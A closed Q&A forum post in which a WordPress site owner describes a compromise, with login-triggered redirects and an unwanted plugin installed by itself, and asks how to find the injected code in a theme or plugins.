WordPress redirect hack – can’t find how they did this [closed]
I have a small WordPress website, and it started to give me some redirects where it is not supposed to. I checked hashsums with wp core verify-checksums and the same for plugins. The problem is - external redirect checkers don't find anything, because it redirects only when I log in.
After I log in, a plugin (sabai, sabai-discuss) gets installed ultr-seo-processor-wp.zip which I didn't install. I can't understand how this is possible if checksums verify.
I have a theme (Unicorn 2.1.3) and a paid plugin which is not checked against checksums. The theme is the main suspect because it hasn't been updated in a long time.
Are there any offline scanners which will work without running webserver?
If I can't find a better solution, I'm thinking of getting rid of the theme, but sabai and sabai-discuss are a crucial part, so I'm looking for a solution to clean up what they inserted there, but I don't know how to find it.
I'd like to keep the modified theme too, because it works too well and everyone is used to it.
How should I approach finding what they added there? I suppose there are some calls for WordPress api in the theme in the admin panel they call to install plugin. What to grep?
My main hope here is that it's an automated hack that some of you have seen in your projects.
I found some files with names like "hidden.php" which were added by the hacker and I removed them, but the problem remains. So I'm asking for advice on what to look for.
I also checked the timestamp of the freshly downloaded zip file of ultra-seo-processor-wp.zip and examined nginx logs. There were no requests but from me logging in admin panel, so I think there should be some WP API calls added in some theme files.
